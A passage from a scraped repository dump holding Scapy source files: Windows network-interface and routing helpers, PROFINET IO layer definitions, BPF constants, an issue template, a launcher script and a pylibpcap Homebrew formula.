POWERSHELL_PROCESS.query([_encapsulate_admin(_WlanHelper + \" \" + self.guid[1:-1] + \" freq \" + str(freq))],\n rst_t=True)\n\n def availablemodulations(self):\n \"\"\"Get all available 
802.11 interface modulations.\n Only available with Npcap.\"\"\"\n # According to https://nmap.org/npcap/guide/npcap-devguide.html#npcap-feature-dot11\n self._check_npcap_requirement()\n return POWERSHELL_PROCESS.query([_WlanHelper, self.guid[1:-1], \"modus\"], crp=False, rst_t=True)[0].strip().split(\",\")\n\n def modulation(self):\n \"\"\"Get the 802.11 modulation of the interface.\n Only available with Npcap.\"\"\"\n # According to https://nmap.org/npcap/guide/npcap-devguide.html#npcap-feature-dot11\n self._check_npcap_requirement()\n return POWERSHELL_PROCESS.query([_WlanHelper, self.guid[1:-1], \"modu\"], crp=False, rst_t=True)[0].strip()\n\n def setmodulation(self, modu):\n \"\"\"Set the interface modulation. It can be:\n - 0: dsss\n - 1: fhss\n - 2: irbaseband\n - 3: ofdm\n - 4: hrdss\n - 5: erp\n - 6: ht\n - 7: vht\n - 8: ihv\n - 9: mimo-ofdm\n - 10: mimo-ofdm\n Only available with Npcap.\"\"\"\n # According to https://nmap.org/npcap/guide/npcap-devguide.html#npcap-feature-dot11\n self._check_npcap_requirement()\n _modus = {\n 0: \"dsss\",\n 1: \"fhss\",\n 2: \"irbaseband\",\n 3: \"ofdm\",\n 4: \"hrdss\",\n 5: \"erp\",\n 6: \"ht\",\n 7: \"vht\",\n 8: \"ihv\",\n 9: \"mimo-ofdm\",\n 10: \"mimo-ofdm\",\n }\n m = _modus.get(modu, \"unknown\") if isinstance(modu, int) else modu\n return not POWERSHELL_PROCESS.query([_encapsulate_admin(_WlanHelper + \" \" + self.guid[1:-1] + \" mode \" + m)],\n rst_t=True)\n\n def __repr__(self):\n return \"<%s %s %s>\" % (self.__class__.__name__, self.name, self.guid)\n\n\ndef pcap_service_name():\n \"\"\"Return the pcap adapter service's name\"\"\"\n return \"npcap\" if conf.use_npcap else \"npf\"\n\n\ndef pcap_service_status():\n \"\"\"Returns a tuple (name, description, started) of the windows pcap adapter\"\"\"\n for i in exec_query(['Get-Service', pcap_service_name()], ['Name', 'DisplayName', 'Status']):\n name = i[0]\n description = i[1]\n started = (i[2].lower().strip() == 'running')\n if name == pcap_service_name():\n return (name, description, started)\n return (None, None, None)\n\n\ndef pcap_service_control(action, askadmin=True):\n \"\"\"Util to run pcap control command\"\"\"\n if not conf.prog.powershell:\n return False\n command = action + ' ' + pcap_service_name()\n stdout = POWERSHELL_PROCESS.query([_encapsulate_admin(command) if askadmin else command])\n return \"error\" not in \"\".join(stdout).lower()\n\n\ndef pcap_service_start(askadmin=True):\n \"\"\"Starts the pcap adapter. Will ask for admin. Returns True if success\"\"\"\n return pcap_service_control('Start-Service', askadmin=askadmin)\n\n\ndef pcap_service_stop(askadmin=True):\n \"\"\"Stops the pcap adapter. Will ask for admin. 
Returns True if success\"\"\"\n return pcap_service_control('Stop-Service', askadmin=askadmin)\n\n\nfrom scapy.modules.six.moves import UserDict\n\n\nclass NetworkInterfaceDict(UserDict):\n \"\"\"Store information about network interfaces and convert between names\"\"\"\n\n def load_from_powershell(self):\n if not conf.prog.os_access:\n return\n ifaces_ips = None\n for i in get_windows_if_list():\n try:\n interface = NetworkInterface(i)\n self.data[interface.guid] = interface\n # If no IP address was detected using winpcap and if\n # the interface is not the loopback one, look for\n # internal windows interfaces\n if not interface.ip:\n if not ifaces_ips: # ifaces_ips is used as a cache\n ifaces_ips = get_ips()\n # If it exists, retrieve the interface's IP from the cache\n interface.ip = ifaces_ips.get(interface.name, \"\")\n except (KeyError, PcapNameNotFoundError):\n pass\n\n if not self.data and conf.use_winpcapy:\n _detect = pcap_service_status()\n\n def _ask_user():\n if not conf.interactive:\n return False\n while True:\n _confir = input(\"Do you want to start it ? (yes/no) [y]: \").lower().strip()\n if _confir in [\"yes\", \"y\", \"\"]:\n return True\n elif _confir in [\"no\", \"n\"]:\n return False\n return False\n _error_msg = \"No match between your pcap and windows network interfaces found. \"\n if _detect[0] and not _detect[2] and not (hasattr(self, \"restarted_adapter\") and self.restarted_adapter):\n warning(\"Scapy has detected that your pcap service is not running !\")\n if not conf.interactive or _ask_user():\n succeed = pcap_service_start(askadmin=conf.interactive)\n self.restarted_adapter = True\n if succeed:\n log_loading.info(\"Pcap service started !\")\n self.load_from_powershell()\n return\n _error_msg = \"Could not start the pcap service ! \"\n warning(_error_msg +\n \"You probably won't be able to send packets. \"\n \"Deactivating unneeded interfaces and restarting Scapy might help. 
\"\n \"Check your winpcap and powershell installation, and access rights.\")\n else:\n # Loading state: remove invalid interfaces\n self.remove_invalid_ifaces()\n # Replace LOOPBACK_INTERFACE\n try:\n scapy.consts.LOOPBACK_INTERFACE = self.dev_from_name(\n scapy.consts.LOOPBACK_NAME,\n )\n except:\n pass\n\n def dev_from_name(self, name):\n \"\"\"Return the first pcap device name for a given Windows\n device name.\n \"\"\"\n try:\n return next(iface for iface in six.itervalues(self)\n if iface.name == name)\n except StopIteration:\n raise ValueError(\"Unknown network interface %r\" % name)\n\n def dev_from_pcapname(self, pcap_name):\n \"\"\"Return Windows device name for given pcap device name.\"\"\"\n try:\n return next(iface for iface in six.itervalues(self)\n if iface.pcap_name == pcap_name)\n except StopIteration:\n raise ValueError(\"Unknown pypcap network interface %r\" % pcap_name)\n\n def dev_from_index(self, if_index):\n \"\"\"Return interface name from interface index\"\"\"\n try:\n return next(iface for iface in six.itervalues(self)\n if iface.win_index == str(if_index))\n except StopIteration:\n if str(if_index) == \"1\":\n # Test if the loopback interface is set up\n if isinstance(scapy.consts.LOOPBACK_INTERFACE, NetworkInterface):\n return scapy.consts.LOOPBACK_INTERFACE\n raise ValueError(\"Unknown network interface index %r\" % if_index)\n\n def remove_invalid_ifaces(self):\n \"\"\"Remove all invalid interfaces\"\"\"\n for devname in list(self.keys()):\n iface = self.data[devname]\n if iface.is_invalid():\n self.data.pop(devname)\n\n def reload(self):\n \"\"\"Reload interface list\"\"\"\n self.restarted_adapter = False\n self.data.clear()\n self.load_from_powershell()\n\n def show(self, resolve_mac=True, print_result=True):\n \"\"\"Print list of available network interfaces in human readable form\"\"\"\n res = []\n for iface_name in sorted(self.data):\n dev = self.data[iface_name]\n mac = dev.mac\n if resolve_mac and conf.manufdb:\n mac = conf.manufdb._resolve_MAC(mac)\n res.append((str(dev.win_index), str(dev.name), str(dev.ip), mac))\n\n res = pretty_list(res, [(\"INDEX\", \"IFACE\", \"IP\", \"MAC\")])\n if print_result:\n print(res)\n else:\n return res\n\n def __repr__(self):\n return self.show(print_result=False)\n\n\n# Init POWERSHELL_PROCESS\nPOWERSHELL_PROCESS = _PowershellManager()\n\nIFACES = ifaces = NetworkInterfaceDict()\nIFACES.load_from_powershell()\n\n\ndef pcapname(dev):\n \"\"\"Return pypcap device name for given interface or libdnet/Scapy\n device name.\n\n \"\"\"\n if isinstance(dev, NetworkInterface):\n if dev.is_invalid():\n return None\n return dev.pcap_name\n try:\n return IFACES.dev_from_name(dev).pcap_name\n except ValueError:\n if conf.use_pcap:\n # pcap.pcap() will choose a sensible default for sniffing if\n # iface=None\n return None\n raise\n\n\ndef dev_from_pcapname(pcap_name):\n \"\"\"Return libdnet/Scapy device name for given pypcap device name\"\"\"\n return IFACES.dev_from_pcapname(pcap_name)\n\n\ndef dev_from_index(if_index):\n \"\"\"Return Windows adapter name for given Windows interface index\"\"\"\n return IFACES.dev_from_index(if_index)\n\n\ndef show_interfaces(resolve_mac=True):\n \"\"\"Print list of available network interfaces\"\"\"\n return IFACES.show(resolve_mac)\n\n\n_orig_open_pcap = pcapdnet.open_pcap\n\n\ndef open_pcap(iface, *args, **kargs):\n \"\"\"open_pcap: Windows routine for creating a pcap from an interface.\n This function is also responsible for detecting monitor mode.\n \"\"\"\n iface_pcap_name = pcapname(iface)\n 
if not isinstance(iface, NetworkInterface) and iface_pcap_name is not None:\n iface = IFACES.dev_from_name(iface)\n if conf.use_npcap and isinstance(iface, NetworkInterface):\n monitored = iface.ismonitor()\n kw_monitor = kargs.get(\"monitor\", None)\n if kw_monitor is None:\n # The monitor param is not specified. Matching it to current state\n kargs[\"monitor\"] = monitored\n elif kw_monitor is not monitored:\n # The monitor param is specified, and not matching the current\n # interface state\n iface.setmonitor(kw_monitor)\n return _orig_open_pcap(iface_pcap_name, *args, **kargs)\n\n\npcapdnet.open_pcap = open_pcap\n\nget_if_raw_hwaddr = pcapdnet.get_if_raw_hwaddr = lambda iface, *args, **kargs: (\n ARPHDR_ETHER, mac2str(IFACES.dev_from_pcapname(pcapname(iface)).mac)\n)\n\n\ndef _read_routes_xp():\n # The InterfaceIndex in Win32_IP4RouteTable does not match the\n # InterfaceIndex in Win32_NetworkAdapter under some platforms\n # (namely Windows XP): let's try an IP association\n routes = []\n partial_routes = []\n # map local IP addresses to interfaces\n local_addresses = {iface.ip: iface for iface in six.itervalues(IFACES)}\n iface_indexes = {}\n for line in exec_query(['Get-WmiObject', 'Win32_IP4RouteTable'],\n ['Name', 'Mask', 'NextHop', 'InterfaceIndex', 'Metric1']):\n if line[2] in local_addresses:\n iface = local_addresses[line[2]]\n # This gives us an association InterfaceIndex <-> interface\n iface_indexes[line[3]] = iface\n routes.append((atol(line[0]), atol(line[1]), \"0.0.0.0\", iface,\n iface.ip, int(line[4])))\n else:\n partial_routes.append((atol(line[0]), atol(line[1]), line[2],\n line[3], int(line[4])))\n for dst, mask, gw, ifidx, metric in partial_routes:\n if ifidx in iface_indexes:\n iface = iface_indexes[ifidx]\n routes.append((dst, mask, gw, iface, iface.ip, metric))\n return routes\n\n\ndef _read_routes_7():\n routes = []\n for line in exec_query(['Get-WmiObject', 'Win32_IP4RouteTable'],\n ['Name', 'Mask', 'NextHop', 'InterfaceIndex', 'Metric1']):\n try:\n iface = dev_from_index(line[3])\n ip = \"127.0.0.1\" if line[3] == \"1\" else iface.ip # Force loopback on iface 1\n routes.append((atol(line[0]), atol(line[1]), line[2], iface, ip, int(line[4])))\n except ValueError:\n continue\n return routes\n\n\ndef read_routes():\n routes = []\n if not conf.prog.os_access:\n return routes\n release = platform.release()\n try:\n if is_new_release():\n routes = _read_routes_post2008()\n elif release == \"XP\":\n routes = _read_routes_xp()\n else:\n routes = _read_routes_7()\n except Exception as e:\n warning(\"Error building scapy IPv4 routing table : %s\", e)\n else:\n if not routes:\n warning(\"No default IPv4 routes found. 
Your Windows release may no be supported and you have to enter your routes manually\")\n return routes\n\n\ndef _get_metrics(ipv6=False):\n \"\"\"Returns a dict containing all IPv4 or IPv6 interfaces' metric,\n ordered by their interface index.\n \"\"\"\n query_cmd = \"netsh interface \" + (\"ipv6\" if ipv6 else \"ipv4\") + \" show interfaces level=verbose\"\n stdout = POWERSHELL_PROCESS.query([query_cmd])\n res = {}\n _buffer = []\n _pattern = re.compile(\".*:\\s+(\\d+)\")\n for _line in stdout:\n if not _line.strip() and len(_buffer) > 0:\n if_index = re.search(_pattern, _buffer[3]).group(1)\n if_metric = int(re.search(_pattern, _buffer[5]).group(1))\n res[if_index] = if_metric\n _buffer = []\n else:\n _buffer.append(_line)\n return res\n\n\ndef _read_routes_post2008():\n routes = []\n if4_metrics = None\n # This works only starting from Windows 8/2012 and up. For older Windows another solution is needed\n # Get-NetRoute -AddressFamily IPV4 | select ifIndex, DestinationPrefix, NextHop, RouteMetric, InterfaceMetric | fl\n for line in exec_query(['Get-NetRoute', '-AddressFamily IPV4'], ['ifIndex', 'DestinationPrefix', 'NextHop', 'RouteMetric', 'InterfaceMetric']):\n try:\n iface = dev_from_index(line[0])\n if iface.ip == \"0.0.0.0\":\n continue\n except:\n continue\n # try:\n # intf = pcapdnet.dnet.intf().get_dst(pcapdnet.dnet.addr(type=2, addrtxt=dest))\n # except OSError:\n # log_loading.warning(\"Building Scapy's routing table: Couldn't get outgoing interface for destination %s\", dest)\n # continue\n dest, mask = line[1].split('/')\n ip = \"127.0.0.1\" if line[0] == \"1\" else iface.ip # Force loopback on iface 1\n if not line[4].strip(): # InterfaceMetric is not available. Load it from netsh\n if not if4_metrics:\n if4_metrics = _get_metrics()\n metric = int(line[3]) + if4_metrics.get(iface.win_index, 0) # RouteMetric + InterfaceMetric\n else:\n metric = int(line[3]) + int(line[4]) # RouteMetric + InterfaceMetric\n routes.append((atol(dest), itom(int(mask)),\n line[2], iface, ip, metric))\n return routes\n\n############\n# IPv6 #\n############\n\n\ndef in6_getifaddr():\n \"\"\"\n Returns all IPv6 addresses found on the computer\n \"\"\"\n ifaddrs = []\n for ifaddr in in6_getifaddr_raw():\n try:\n ifaddrs.append((ifaddr[0], ifaddr[1], dev_from_pcapname(ifaddr[2])))\n except ValueError:\n pass\n # Appends Npcap loopback if available\n if conf.use_npcap and scapy.consts.LOOPBACK_INTERFACE:\n ifaddrs.append((\"::1\", 0, scapy.consts.LOOPBACK_INTERFACE))\n return ifaddrs\n\n\ndef _append_route6(routes, dpref, dp, nh, iface, lifaddr, metric):\n cset = [] # candidate set (possible source addresses)\n if iface.name == scapy.consts.LOOPBACK_NAME:\n if dpref == '::':\n return\n cset = ['::1']\n else:\n devaddrs = (x for x in lifaddr if x[2] == iface)\n cset = construct_source_candidate_set(dpref, dp, devaddrs)\n if not cset:\n return\n # APPEND (DESTINATION, NETMASK, NEXT HOP, IFACE, CANDIDATS, METRIC)\n routes.append((dpref, dp, nh, iface, cset, metric))\n\n\ndef _read_routes6_post2008():\n routes6 = []\n if6_metrics = None\n # This works only starting from Windows 8/2012 and up. 
For older Windows another solution is needed\n # Get-NetRoute -AddressFamily IPV6 | select ifIndex, DestinationPrefix, NextHop | fl\n lifaddr = in6_getifaddr()\n for line in exec_query(['Get-NetRoute', '-AddressFamily IPV6'], ['ifIndex', 'DestinationPrefix', 'NextHop', 'RouteMetric', 'InterfaceMetric']):\n try:\n if_index = line[0]\n iface = dev_from_index(if_index)\n except:\n continue\n\n dpref, dp = line[1].split('/')\n dp = int(dp)\n nh = line[2]\n if not line[4].strip(): # InterfaceMetric is not available. Load it from netsh\n if not if6_metrics:\n if6_metrics = _get_metrics(ipv6=True)\n metric = int(line[3]) + if6_metrics.get(iface.win_index, 0) # RouteMetric + InterfaceMetric\n else:\n metric = int(line[3]) + int(line[4]) # RouteMetric + InterfaceMetric\n\n _append_route6(routes6, dpref, dp, nh, iface, lifaddr, metric)\n return routes6\n\n\ndef _read_routes6_7():\n # Not supported in powershell, we have to use netsh\n routes = []\n query_cmd = \"netsh interface ipv6 show route level=verbose\"\n stdout = POWERSHELL_PROCESS.query([query_cmd])\n lifaddr = in6_getifaddr()\n if6_metrics = _get_metrics(ipv6=True)\n # Define regexes\n r_int = [\".*:\\s+(\\d+)\"]\n r_all = [\"(.*)\"]\n r_ipv6 = [\".*:\\s+([A-z|0-9|:]+(\\/\\d+)?)\"]\n # Build regex list for each object\n regex_list = r_ipv6 * 2 + r_int + r_all * 3 + r_int + r_all * 3\n current_object = []\n index = 0\n for l in stdout:\n if not l.strip():\n if not current_object:\n continue\n\n if len(current_object) == len(regex_list):\n try:\n if_index = current_object[2]\n iface = dev_from_index(if_index)\n except:\n current_object = []\n index = 0\n continue\n _ip = current_object[0].split(\"/\")\n dpref = _ip[0]\n dp = int(_ip[1])\n _match = re.search(r_ipv6[0], current_object[3])\n nh = \"::\"\n if _match: # Detect if Next Hop is specified (if not, it will be the IFName)\n _nhg1 = _match.group(1)\n nh = _nhg1 if re.match(\".*:.*:.*\", _nhg1) else \"::\"\n metric = int(current_object[6]) + if6_metrics.get(if_index, 0)\n _append_route6(routes, dpref, dp, nh, iface, lifaddr, metric)\n\n # Reset current object\n current_object = []\n index = 0\n else:\n pattern = re.compile(regex_list[index])\n match = re.search(pattern, l)\n if match:\n current_object.append(match.group(1))\n index = index + 1\n return routes\n\n\ndef read_routes6():\n routes6 = []\n if not conf.prog.os_access:\n return routes6\n try:\n # Interface metrics have been added to powershell in win10+\n if is_new_release():\n routes6 = _read_routes6_post2008()\n else:\n routes6 = _read_routes6_7()\n except Exception as e:\n warning(\"Error building scapy IPv6 routing table : %s\", e)\n return routes6\n\n\ndef get_working_if():\n try:\n # return the interface associated with the route with smallest\n # mask (route by default if it exists)\n return min(conf.route.routes, key=lambda x: x[1])[3]\n except ValueError:\n # no route\n return scapy.consts.LOOPBACK_INTERFACE\n\n\ndef _get_valid_guid():\n if scapy.consts.LOOPBACK_INTERFACE:\n return scapy.consts.LOOPBACK_INTERFACE.guid\n else:\n return next((i.guid for i in six.itervalues(IFACES)\n if not i.is_invalid()), None)\n\n\ndef route_add_loopback(routes=None, ipv6=False, iflist=None):\n \"\"\"Add a route to 127.0.0.1 and ::1 to simplify unit tests on Windows\"\"\"\n if not WINDOWS:\n warning(\"Not available\")\n return\n warning(\"This will completly mess up the routes. 
Testing purpose only !\")\n # Add only if some adpaters already exist\n if ipv6:\n if not conf.route6.routes:\n return\n else:\n if not conf.route.routes:\n return\n data = {\n 'name': scapy.consts.LOOPBACK_NAME,\n 'description': \"Loopback\",\n 'win_index': -1,\n 'guid': _get_valid_guid(),\n 'invalid': False,\n 'mac': '00:00:00:00:00:00',\n }\n data['pcap_name'] = six.text_type(\"\\\\Device\\\\NPF_\" + data['guid'])\n adapter = NetworkInterface(data)\n adapter.ip = \"127.0.0.1\"\n if iflist:\n iflist.append(adapter.pcap_name)\n return\n # Remove all LOOPBACK_NAME routes\n for route in list(conf.route.routes):\n iface = route[3]\n if iface.name == scapy.consts.LOOPBACK_NAME:\n conf.route.routes.remove(route)\n # Remove LOOPBACK_NAME interface\n for devname, iface in list(IFACES.items()):\n if iface.name == scapy.consts.LOOPBACK_NAME:\n IFACES.pop(devname)\n # Inject interface\n IFACES[\"{0XX00000-X000-0X0X-X00X-00XXXX000XXX}\"] = adapter\n scapy.consts.LOOPBACK_INTERFACE = adapter\n if isinstance(conf.iface, NetworkInterface):\n if conf.iface.name == LOOPBACK_NAME:\n conf.iface = adapter\n if isinstance(conf.iface6, NetworkInterface):\n if conf.iface6.name == LOOPBACK_NAME:\n conf.iface6 = adapter\n # Build the packed network addresses\n loop_net = struct.unpack(\"!I\", socket.inet_aton(\"127.0.0.0\"))[0]\n loop_mask = struct.unpack(\"!I\", socket.inet_aton(\"255.0.0.0\"))[0]\n # Build the fake routes\n loopback_route = (loop_net, loop_mask, \"0.0.0.0\", adapter, \"127.0.0.1\", 1)\n loopback_route6 = ('::1', 128, '::', adapter, [\"::1\"], 1)\n loopback_route6_custom = (\"fe80::\", 128, \"::\", adapter, [\"::1\"], 1)\n if routes is None:\n # Injection\n conf.route6.routes.append(loopback_route6)\n conf.route6.routes.append(loopback_route6_custom)\n conf.route.routes.append(loopback_route)\n # Flush the caches\n conf.route6.invalidate_cache()\n conf.route.invalidate_cache()\n else:\n if ipv6:\n routes.append(loopback_route6)\n routes.append(loopback_route6_custom)\n else:\n routes.append(loopback_route)\n\n\nif not conf.use_winpcapy:\n\n class NotAvailableSocket(SuperSocket):\n desc = \"wpcap.dll missing\"\n\n def __init__(self, *args, **kargs):\n raise RuntimeError(\"Sniffing and sending packets is not available: \"\n \"winpcap is not installed\")\n\n conf.L2socket = NotAvailableSocket\n conf.L2listen = NotAvailableSocket\n conf.L3socket = NotAvailableSocket\n" }, { "alpha_fraction": 0.7279999852180481, "alphanum_fraction": 0.7379999756813049, "avg_line_length": 37.46154022216797, "blob_id": "0852ce99bfdb3401e94f18b56e82cc80cb8f6786", "content_id": "fd51da47570468571d7276a34431acaf50fb73f0", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": true, "language": "Markdown", "length_bytes": 1500, "license_type": "permissive", "max_line_length": 246, "num_lines": 39, "path": "/scapy/.github/ISSUE_TEMPLATE.md", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "#### Things to consider\n\n1. Please check that you are using the latest scapy version, e.g. installed via:\n\n `pip install https://github.com/secdev/scapy`\n\n2. If you are here to ask a question - please check previous issues and online resources, and consider using gitter instead: https://gitter.im/secdev/scapy\n\n3. Please understand that **this is not a forum** but an issue tracker. 
The following article explains why you should limit questions asked on Github issues: https://medium.com/@methane/why-you-must-not-ask-questions-on-github-issues-51d741d83fde\n\n#### Brief description\n\n< describe the main issue in one sentence >\n\n< if possible, describe what components / protocols could be affected by the issue (e.g. wrpcap() + IPv6, it is likely this also affects XXX) >\n\n#### Environment\n\n- Scapy version: < scapy version and/or commit-hash >\n- Python version: < e.g. 3.5 >\n- Operating System: < e.g. Minix 3.4 >\n\n< if needed - further information to get a picture of your setup (e.g. a sketch of your network setup) >\n\n#### How to reproduce\n\n< step-by-step explanation or a short script, may reference section 'Related resources' >\n\n#### Actual result\n\n< dump results that outline the issue, please format your code >\n\n#### Expected result\n\n< describe the expected result and outline the difference to the actual one, could also be a screen shot (e.g. wireshark) >\n\n#### Related resources\n\n< traces / sample pcaps (stripped to the relevant frames), related standards, RFCs or other resources >\n" }, { "alpha_fraction": 0.7177419066429138, "alphanum_fraction": 0.725806474685669, "avg_line_length": 23.799999237060547, "blob_id": "fff71d9d993bab400919f3540491922f1ee34d06", "content_id": "7256d5de7599418274145f8a05ffeb12c0742000", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 124, "license_type": "permissive", "max_line_length": 40, "num_lines": 5, "path": "/scapy/run_scapy", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "#! /bin/sh\nDIR=$(dirname $0)\nPYTHONDONTWRITEBYTECODE=True\nPYTHON=${PYTHON:-python}\nPYTHONPATH=$DIR exec $PYTHON -m scapy $@\n" }, { "alpha_fraction": 0.6332813501358032, "alphanum_fraction": 0.6784878969192505, "avg_line_length": 31.075000762939453, "blob_id": "d53a78762cd24fa019adf66bbcbb52b8c9f4c2b0", "content_id": "9b47427fd949949ce01ffb742701eb863a26cc22", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2566, "license_type": "permissive", "max_line_length": 76, "num_lines": 80, "path": "/scapy/scapy/contrib/pnio.py", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "# This file is part of Scapy\n# Scapy is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 2 of the License, or\n# any later version.\n#\n# Scapy is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Scapy. 
If not, see <http://www.gnu.org/licenses/>.\n\n# Copyright (C) 2016 Gauthier Sebaux\n\n# scapy.contrib.description = ProfinetIO base layer\n# scapy.contrib.status = loads\n\n\"\"\"\nA simple and non exhaustive Profinet IO layer for scapy\n\"\"\"\n\n# Scapy imports\nfrom __future__ import absolute_import\nfrom scapy.all import Packet, bind_layers, Ether, UDP\nfrom scapy.fields import XShortEnumField\nfrom scapy.modules.six.moves import range\n\n# Some constants\nPNIO_FRAME_IDS = {\n 0x0020: \"PTCP-RTSyncPDU-followup\",\n 0x0080: \"PTCP-RTSyncPDU\",\n 0xFC01: \"Alarm High\",\n 0xFE01: \"Alarm Low\",\n 0xFEFC: \"DCP-Hello-Req\",\n 0xFEFD: \"DCP-Get-Set\",\n 0xFEFE: \"DCP-Identify-ReqPDU\",\n 0xFEFF: \"DCP-Identify-ResPDU\",\n 0xFF00: \"PTCP-AnnouncePDU\",\n 0xFF20: \"PTCP-FollowUpPDU\",\n 0xFF40: \"PTCP-DelayReqPDU\",\n 0xFF41: \"PTCP-DelayResPDU-followup\",\n 0xFF42: \"PTCP-DelayFuResPDU\",\n 0xFF43: \"PTCP-DelayResPDU\",\n}\nfor i in range(0x0100, 0x1000):\n PNIO_FRAME_IDS[i] = \"RT_CLASS_3\"\nfor i in range(0x8000, 0xC000):\n PNIO_FRAME_IDS[i] = \"RT_CLASS_1\"\nfor i in range(0xC000, 0xFC00):\n PNIO_FRAME_IDS[i] = \"RT_CLASS_UDP\"\nfor i in range(0xFF80, 0xFF90):\n PNIO_FRAME_IDS[i] = \"FragmentationFrameID\"\n\n#################\n# PROFINET IO #\n#################\n\n\nclass ProfinetIO(Packet):\n \"\"\"Basic PROFINET IO dispatcher\"\"\"\n fields_desc = [XShortEnumField(\"frameID\", 0, PNIO_FRAME_IDS)]\n overload_fields = {\n Ether: {\"type\": 0x8892},\n UDP: {\"dport\": 0x8892},\n }\n\n def guess_payload_class(self, payload):\n # For frameID in the RT_CLASS_* range, use the RTC packet as payload\n if (self.frameID >= 0x0100 and self.frameID < 0x1000) or \\\n (self.frameID >= 0x8000 and self.frameID < 0xFC00):\n from scapy.contrib.pnio_rtc import PNIORealTime\n return PNIORealTime\n else:\n return Packet.guess_payload_class(self, payload)\n\n\nbind_layers(Ether, ProfinetIO, type=0x8892)\nbind_layers(UDP, ProfinetIO, dport=0x8892)\n" }, { "alpha_fraction": 0.6430678367614746, "alphanum_fraction": 0.7817109227180481, "avg_line_length": 36.55555725097656, "blob_id": "0856933d8ec308a9bc6fd3c90f2b1db96ca1c7e6", "content_id": "c1104c84c6945b384ce97662972a205dfae8dd1a", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 339, "license_type": "permissive", "max_line_length": 97, "num_lines": 9, "path": "/scapy/.travis/pylibpcap.rb", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "class Pylibpcap <Formula\n url \"http://downloads.sourceforge.net/project/pylibpcap/pylibpcap/0.6.4/pylibpcap-0.6.4.tar.gz\"\n homepage \"http://pylibpcap.sourceforge.net/\"\n sha256 \"cfc365f2707a7986496acacf71789fef932a5ddbeaa36274cc8f9834831ca3b1\"\n \n def install\n system \"python\", *Language::Python.setup_install_args(prefix)\n end\nend\n\n" }, { "alpha_fraction": 0.5302325487136841, "alphanum_fraction": 0.7674418687820435, "avg_line_length": 16.200000762939453, "blob_id": "1870c09387c6af152b0d7fa118542ef39c3978b0", "content_id": "1e41bd3918a4e708796e60f5f0c94a3dcd99c32b", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 430, "license_type": "permissive", "max_line_length": 37, "num_lines": 25, "path": "/scapy/scapy/arch/bpf/consts.py", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "# Guillaume 
Valadon <guillaume@valadon.net>\n\n\"\"\"\nScapy *BSD native support - constants\n\"\"\"\n\n\nfrom scapy.data import MTU\n\n\nSIOCGIFFLAGS = 0xc0206911\nBPF_BUFFER_LENGTH = MTU\n\n# From net/bpf.h\nBIOCIMMEDIATE = 0x80044270\nBIOCGSTATS = 0x4008426f\nBIOCPROMISC = 0x20004269\nBIOCSETIF = 0x8020426c\nBIOCSBLEN = 0xc0044266\nBIOCGBLEN = 0x40044266\nBIOCSETF = 0x80104267\nBIOCSDLT = 0x80044278\nBIOCSHDRCMPLT = 0x80044275\nBIOCGDLT = 0x4004426a\nDLT_IEEE802_11_RADIO = 127\n" }, { "alpha_fraction": 0.5739399790763855, "alphanum_fraction": 0.5800139904022217, "avg_line_length": 33.87168884277344, "blob_id": "0886624dfd9486dc3b92e400d4af1e45cf1e8080", "content_id": "eed7ca69e3c8294a61aeba5e9a58d39357ea48f4", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17122, "license_type": "permissive", "max_line_length": 115, "num_lines": 491, "path": "/scapy/scapy/contrib/pnio_rtc.py", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "# This file is part of Scapy\n# Scapy is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 2 of the License, or\n# any later version.\n#\n# Scapy is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Scapy. If not, see <http://www.gnu.org/licenses/>.\n\n# Copyright (C) 2016 Gauthier Sebaux\n\n# scapy.contrib.description = ProfinetIO Real-Time Cyclic (RTC)\n# scapy.contrib.status = loads\n\n\"\"\"\nPROFINET IO layers for scapy which correspond to Real-Time Cyclic data\n\"\"\"\n\n# external imports\nfrom __future__ import absolute_import\nimport math\nimport struct\n\n# Scapy imports\nfrom scapy.all import Packet, bind_layers, Ether, UDP, Field, conf\nfrom scapy.fields import BitEnumField, BitField, ByteField,\\\n FlagsField,\\\n PacketListField,\\\n ShortField, StrFixedLenField,\\\n XBitField, XByteField\n\n# local imports\nfrom scapy.contrib.pnio import ProfinetIO\nfrom scapy.compat import orb\nfrom scapy.modules.six.moves import range\n\n\n#####################################\n# PROFINET Real-Time Data Packets #\n#####################################\n\nclass PNIORealTimeIOxS(Packet):\n \"\"\"IOCS and IOPS packets for PROFINET Real-Time payload\"\"\"\n name = \"PNIO RTC IOxS\"\n fields_desc = [\n BitEnumField(\"dataState\", 1, 1, [\"bad\", \"good\"]),\n BitEnumField(\"instance\", 0, 2, [\"subslot\", \"slot\", \"device\", 